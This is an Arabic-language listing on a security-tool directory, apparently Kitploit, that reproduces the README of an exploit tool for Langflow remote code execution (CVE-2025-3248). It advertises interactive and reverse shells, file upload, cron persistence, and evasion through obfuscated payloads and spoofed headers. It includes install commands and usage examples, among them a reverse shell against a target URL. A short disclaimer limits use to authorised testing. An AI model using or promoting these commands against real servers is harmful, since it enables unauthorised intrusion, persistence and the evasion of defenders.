Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
langflow-rce-exploit — استغلال تنفيذ التعليمات البرمجية عن بُعد لـ Langflow (CVE-2025-3248) - [ بواسطة S4Tech ] | Kitploit
أدوات/GitHubGitHub/0-d3y/langflow-rce-exploit
تصعيد الامتيازاتآليات الاستمراريةتحليل الثغرات الأمنيةالاستغلالشيل كوداستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرةالفريق الأحمرأداة الوصول عن بعدتطوير الحمولات
715منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
GitHub
0-d3y/langflow-rce-exploit

langflow-rce-exploit

استغلال تنفيذ التعليمات البرمجية عن بُعد لـ Langflow (CVE-2025-3248) - [ بواسطة S4Tech ]

عرض المستودع

استغلال تنفيذ الأوامر عن بعد في Langflow (CVE-2025-3248)

Python Version License Platform

أداة استغلال تنفيذ الأوامر عن بعد في Langflow (CVE-2025-3248)

الميزات

  • الكشف التلقائي عن الثغرات
  • أوضاع استغلال متعددة:
    • شل تفاعلية
    • تنفيذ أمر واحد
    • اتصال شل عكسية
  • إمكانية رفع الملفات
  • واجهة مستخدم ملونة
  • طرق متعددة للشل العكسية
  • حفظ سجل الأوامر

📌 سجل التغييرات (v2.0)

✨ ميزات جديدة:

  • نظام الحمولات المتقدم مع 5 طرق تنفيذ
  • رفع/تنزيل الملفات بتشفير Base64
  • الثبات عبر مهام cron (أمر persist)
  • ترقية الشل التفاعلية:
    • upload local_path remote_path
    • download remote_path local_path
    • أمر clear للطرفية

🛡️ تحسينات أمنية:

  • إخفاء الحمولة تلقائيًا (Base64 + متغيرات عشوائية)
  • تدوير الترويسة لكل طلب:
    • وكيل مستخدم User-Agent عشوائي
    • عناوين IP مزيفة X-Forwarded-For
  • تجاوز HTTPS (دعم الشهادات الموقعة ذاتيًا)
  • لا إعادة توجيه لتجنب الكشف

⚡ تحسينات تقنية:

  • التحقق متعدد المراحل من الثغرة
  • تحسين معالجة الأخطاء للاتصالات غير المستقرة
  • تسجيل الجلسة بالكامل إلى exploit_log.txt
  • حفظ سجل الأوامر (.langflow_shell_history)

📊 مقارنة الإصدارات:

🐛 إصلاحات الأخطاء:

  • إصلاح مشكلات اتصال HTTPS
  • تحسين معالجة الأحرف الخاصة في الأوامر
  • استقرار موثوقية الشل العكسية

المتطلبات

  • Python 3.6 أو أحدث
  • المكتبات المطلوبة:
    • requests
    • colorama
    • readline

التثبيت

root@kitploit:~
git clone https://github.com/0-d3y/langflow-rce-exploit.git
cd langflow-rce-exploit
pip install -r requirements.txt

الاستخدام

root@kitploit:~
python exploit.py <URL> [options]

الخيارات المتاحة:

أمثلة:

  1. التحقق من الثغرة:
root@kitploit:~
python exploit.py http://target.com
  1. بدء شل تفاعلية:
root@kitploit:~
python exploit.py http://target.com --shell
  1. تنفيذ أمر واحد:
root@kitploit:~
python exploit.py http://target.com --command "whoami"
  1. إطلاق شل عكسية:
root@kitploit:~
python exploit.py http://target.com --reverse 192.168.1.100 4444

لقطات الشاشة

Image.png)

تحذير

⚠️ هذه الأداة مخصصة لأغراض التعليم والاختبار المصرح به فقط.
⚠️ الاستخدام غير المصرح به ضد أنظمة لا تملكها أو ليس لديك إذن باختبارها يعد غير قانوني.

الترخيص

هذا المشروع مرخص بموجب رخصة MIT - راجع ملف LICENSE للحصول على التفاصيل.

المؤلف

  • Mr.SaMi
    Twitter
    Instagram

المساهمة

نرحب بطلبات السحب. للتغييرات الكبيرة، يرجى فتح مشكلة أولاً لمناقشة ما ترغب في تغييره.

تنزيل الأداة
الميزةv1.0v2.0
طرق الحمولة15
نقل الملفات❌ غير مدعوم✅ مدعوم
الثبات❌✅
مستوى التخفيأساسيمتقدم
تسجيل الجلسة❌✅
الخيارالوصف
--shellبدء شل تفاعلية
--reverse IP PORTإطلاق شل عكسية إلى IP:PORT محدد
--command CMDتنفيذ أمر واحد
--verboseتفعيل الإخراج المفصل
--timeout SECتعيين مهلة الطلب (الافتراضي: 10 ثوانٍ)